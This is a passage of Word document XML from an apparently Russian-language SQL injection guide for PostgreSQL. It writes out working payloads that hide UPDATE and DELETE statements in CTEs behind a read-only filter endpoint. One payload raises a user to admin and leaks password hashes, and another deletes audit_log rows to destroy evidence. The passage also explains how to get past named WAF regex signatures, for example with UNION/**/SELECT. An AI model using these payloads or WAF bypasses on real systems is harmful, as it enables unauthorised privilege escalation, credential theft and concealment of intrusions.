        <w:t xml:space="preserve">  SELECT id AS id, email AS name, length(password_hash)::numeric AS total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6C1E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  FROM upd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A90918" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) sub--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE9937" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Эффект:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D88F00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-эффект</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE users SET role='admin' WHERE id=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — повышение privileges пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до admin. Если application-логика проверяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role='admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для доступа к admin-панели — атакующий получает админ-доступ через свою (или контролируемую) учётку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2B96F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read-эффект</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNING id, email, password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обновлённая строка возвращается в CTE → конвертируется во внешнее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(id, name, total)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через UNION-cast. Атакующий получает hash в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:t>-колонке (как длину, для skip-обхода числового type-фильтра — но реальный hash утечёт, если cast пройдёт).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C0A746" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для извлечения самого hash: использовать UNION-cast в text напрямую (если column-types совпадают) или вывести через 3.4 (time-based) с CTE-обёрткой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DDFB00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — DELETE для уничтожения evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF30F48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: тот же эндпоинт. Application-роль имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_sessions</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E26A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053DCB49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL UNION SELECT count(*), '', 0 FROM (WITH del AS (DELETE FROM audit_log WHERE user_id=current_user::regrole::oid::int RETURNING id) SELECT id FROM del) sub--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC513D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B560F6"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 WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00558201" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT count(*), '', 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B692286" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E576E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH del AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4CFCA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    DELETE FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D84E5B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE user_id=current_user::regrole::oid::int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D518E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURNING id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE97B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F2D4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT id FROM del</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A03D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) sub--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE24EA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эффект: все строки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, принадлежащие текущему application-user (часто это атакующий — application использует одну роль для всех API-запросов; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = application_user), удаляются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>count(*)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от удалённых RETURNING — обратная связь, сколько строк было.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF7C89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user::regrole::oid::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо литерала ID — payload работает независимо от реального ID application-роли (опpe определяется в рантайме).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C896BF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF8E2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Read-only-эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/orders/filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (имя, схема, описание в OpenAPI — всё указывает на read) фактически выполняет write-операцию. Это критическая поломка модели "GET = идемпотент, без побочных эффектов":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFEAEC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenAPI/REST spec нарушен</w:t>
      </w:r>
      <w:r>
        <w:t>: документация говорит, что эндпоинт read-only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41835B43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization-фильтры обходятся</w:t>
      </w:r>
      <w:r>
        <w:t>: middleware, разрешающее GET без CSRF-токена (потому что GET «безопасен»), теперь пропускает write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6750ECCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Логирование не помогает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: если приложение логирует только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как write-events, эти атаки не попадают в audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2699A861" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache-стратегии ломаются</w:t>
      </w:r>
      <w:r>
        <w:t>: GET-ответы кэшируются (CDN, browser), но реальное состояние БД меняется при каждом запросе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD4948" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17514A44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не блокируется extended-protocol-stacking-ограничением</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — одна команда. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg3</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asyncpg</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пропускают её через single-Parse, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AD6F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF-сигнатура `\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.9.0) не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — DML обычно не в blacklist (легитимные API имеют POST-эндпоинты с этими словами в JSON-body).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63358769" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF-сигнатура `\bUNION\s+SELECT\b`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ловит классический UNION-канал. Payload C с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT count(*), '', 0 FROM (WITH ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>, триггерит. Чтобы обойти — 3.9.6 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION/**/SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>) или вынести DELETE в подзапрос без UNION (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IN (WITH del AS (DELETE ... RETURNING id) SELECT id FROM del)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION не нужен, но требует, чтобы injection-точка допускала subquery в WHERE без UNION-обёртки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798C481" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB737EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS (INSERT|UPDATE|DELETE ... RETURNING ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стабильная фича с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (документация: «Data-Modifying Statements in WITH», https://www.postgresql.org/docs/current/queries-with.html#QUERIES-WITH-MODIFYING).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E90EE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обязателен, если CTE используется в outer SELECT (без RETURNING результат CTE — пустой, и outer SELECT возвращает 0 строк, что обычно ломает UNION-структуру через mismatched types).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDC0A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   DML в CTE выполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> outer SELECT, независимо от того, читает ли outer SELECT данные CTE (важно: даже если outer SELECT не использует CTE-результат, DML-эффект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> применяется).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5003E556" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Каждая DML-CTE видит снапшот на старте оператора — не результаты других DML-CTE в той же команде (см. PG-docs §7.8.2). Это значит: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH a AS (INSERT INTO t VALUES (1)), b AS (SELECT * FROM t) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
